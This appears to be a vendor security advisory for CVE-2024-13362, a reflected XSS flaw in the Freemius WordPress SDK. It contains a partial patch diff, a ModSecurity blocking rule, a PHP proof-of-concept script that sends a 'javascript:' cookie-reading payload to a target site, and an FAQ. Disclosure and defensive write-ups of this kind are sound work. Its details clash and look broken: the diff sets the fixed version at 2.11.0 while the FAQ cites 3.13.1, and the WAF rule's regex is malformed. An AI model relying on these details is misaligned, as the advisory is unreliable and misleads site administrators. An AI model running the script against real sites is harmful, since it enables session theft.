+				( false === strpos( $parent_slug, '?' ) ? '?' : '&' ) .
+				'page=' .
+				$menu_slug
+			);
 		}

 		/**
--- a/bulletin-announcements/modules/freemius/includes/managers/class-fs-admin-notice-manager.php
+++ b/bulletin-announcements/modules/freemius/includes/managers/class-fs-admin-notice-manager.php
@@ -194,8 +194,14 @@
          * @since  1.0.7
          */
         static function _add_sticky_dismiss_javascript() {
+            $sticky_admin_notice_js_template_name = 'sticky-admin-notice-js.php';
+
+            if ( ! file_exists( fs_get_template_path( $sticky_admin_notice_js_template_name ) ) ) {
+                return;
+            }
+
             $params = array();
-            fs_require_once_template( 'sticky-admin-notice-js.php', $params );
+            fs_require_once_template( $sticky_admin_notice_js_template_name, $params );
         }

         private static $_added_sticky_javascript = false;
--- a/bulletin-announcements/modules/freemius/start.php
+++ b/bulletin-announcements/modules/freemius/start.php
@@ -15,7 +15,7 @@
 	 *
 	 * @var string
 	 */
-	$this_sdk_version = '2.10.1';
+	$this_sdk_version = '2.11.0';

 	#region SDK Selection Logic --------------------------------------------------------------------

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2024-13362
# This rule blocks reflected DOM-based XSS exploitation via the 'url' parameter
# It matches requests containing common XSS payloads in the url parameter like 'javascript:'
SecRule REQUEST_URI "@rx ?url=" 
  "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2024-13362 - DOM XSS via url parameter',severity:'CRITICAL',tag:'CVE-2024-13362'"
  SecRule ARGS:url "@rx ^javascript:" 
    "t:lowercase,id:20261994"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept
// CVE-2024-13362 - Freemius <= 2.10.1 - Reflected DOM-Based Cross-Site Scripting via url Parameter

// Configure the target URL (change to the victim site)
$target_url = 'https://example.com';
// The vulnerable parameter (varies per plugin; use 'url' or 'redirect')
$vuln_param = 'url';

// XSS payload: a simple alert to demonstrate script execution
$payload = 'javascript:alert(document.cookie)';

// Construct the malicious URL
$malicious_url = $target_url . '/?' . urlencode($vuln_param) . '=' . urlencode($payload);

echo "[+] Atomic Edge CVE Research - PoCn";
echo "[+] CVE-2024-13362 - Reflected DOM XSSn";
echo "[+] Target: $target_urln";
echo "[+] Payload: $payloadn";
echo "[+] Malicious URL: $malicious_urlnn";

// Send request and capture response (to verify vulnerability)
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $malicious_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code == 200) {
    // Check if payload appears in response (indicating reflection)
    if (strpos($response, $payload) !== false) {
        echo "[+] SUCCESS: Payload reflected in response (vulnerable)n";
    } else {
        echo "[-] Payload not directly reflected (check DOM-based execution)n";
        echo "[!] If the site executes JavaScript from the URL hash or query, the XSS may still work.n";
    }
} else {
    echo "[-] HTTP error: $http_coden";
}

echo "n[!] Manual verification: Open the malicious URL in a browser and see if an alert box appears.n";
echo "[!] If yes, the site is vulnerable. Do not use this on live systems without permission.n";
?>

Frequently Asked Questions

What is CVE-2024-13362?
Overview of the vulnerability
CVE-2024-13362 is a reflected DOM-based Cross-Site Scripting (XSS) vulnerability affecting the Freemius SDK used in multiple WordPress plugins and themes. It allows unauthenticated attackers to inject arbitrary web scripts through the url parameter due to insufficient input sanitization.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability occurs when a crafted URL containing a malicious payload is clicked by a user. The vulnerable JavaScript reads the url parameter and injects it into the DOM without proper escaping, allowing the execution of arbitrary scripts in the user’s browser.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Freemius SDK version 2.10.1 or lower is potentially affected. Administrators should check their installed plugins and themes for the use of Freemius SDK to determine if they are at risk.
How can I check if my site is vulnerable?
Verification steps
To check for vulnerability, verify the version of the Freemius SDK in use on your WordPress site. If it is version 2.10.1 or earlier, your site is vulnerable. Additionally, you can test for the vulnerability by attempting to inject a malicious payload through the url parameter.
How can I fix or mitigate this issue?
Recommended actions
To mitigate this vulnerability, update the Freemius SDK to version 3.13.1 or later, where the issue has been patched. Additionally, ensure that all input parameters are properly sanitized and escaped in your own code.
What does the CVSS score of 6.1 mean?
Understanding severity levels
A CVSS score of 6.1 indicates a medium severity vulnerability. This means that while the vulnerability is not the most critical, it can still be exploited easily and may lead to significant consequences such as session hijacking or data theft.
What is reflected DOM-based XSS?
Explaining the attack type
Reflected DOM-based XSS occurs when an attacker injects malicious scripts into a web application via a URL parameter, which is then reflected back to the user’s browser. This type of XSS does not require persistent storage on the server and is executed immediately when the user clicks the link.
What is the proof of concept for this vulnerability?
Demonstration of exploitation
The proof of concept demonstrates how an attacker can craft a URL with a malicious payload that triggers an alert displaying the user’s cookies. This shows how easily an attacker can exploit the vulnerability by tricking a user into clicking a link.
Can this vulnerability be exploited without authentication?
Access requirements
Yes, this vulnerability can be exploited by unauthenticated users. An attacker does not need any special access or credentials to exploit this vulnerability, making it particularly dangerous.
What are the potential impacts of this vulnerability?
Consequences of exploitation
Successful exploitation can lead to various malicious actions, including session hijacking, credential theft, and redirection to phishing sites. Because the attack is reflected, only users who click on the malicious link are affected.
How can I protect my site from similar vulnerabilities in the future?
Best practices for security
To protect against similar vulnerabilities, regularly update all plugins and themes, implement strict input validation and output escaping, and conduct regular security audits of your WordPress site. Additionally, consider using security plugins that can help identify and mitigate such risks.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations